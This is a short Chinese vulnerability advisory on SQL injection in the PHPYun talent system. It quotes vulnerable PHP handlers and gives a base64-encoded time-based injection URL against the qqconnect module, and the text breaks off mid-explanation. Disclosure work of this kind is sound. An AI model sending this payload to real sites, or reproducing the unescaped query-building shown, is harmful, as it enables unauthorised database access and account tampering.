php云人才系统sql注入漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: ### 详细说明: index.php?M=qqconnect&C=mcert&id=MScgYW5kIHNsZWVwKDEwKSBhbmQgJzEnPScxfDE0OTA4MTQyfA== 测试 model/qqconnect.class.php function mcert_action(){ $id=$_GET['id']; $arr=@explode("|",base64_decode($id));//解码 if($id && is_array($arr) && $arr[0] && $arr[2]==$this->config['coding']){//主要看coding 是配置文件里面的 默认是空 如果修改 #echo "`email_status`='1'","`uid`='".$arr[0]."'"; $nid=$this->obj->DB_update_all("member","`email_status`='1'","`uid`='".$arr[0]."'");//带入查询 $nid?$this->obj->ACT_msg($this->config['sy_weburl']."/index.php?M=login&usertype=1","激活成功"):$this->obj->ACT_msg($this->config['sy_weburl'],"激活失败,联系管理员认证"); }else{ $this->obj->ACT_msg($this->config['sy_weburl'],"非法操作!","2"); } } 如果网站修改了coding的情况下 model/sendcert.class.php function sendcert_action() { extract($_POST); if(md5($_POST["authcode"])!=$_SESSION[authcode]){ $this->obj->ACT_msg("index.php?M=forgetpw","验证码错误","2"); } $info = $this->obj->DB_select_once("member","`username`='$username'","`uid`,`email_status`,`email`");...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息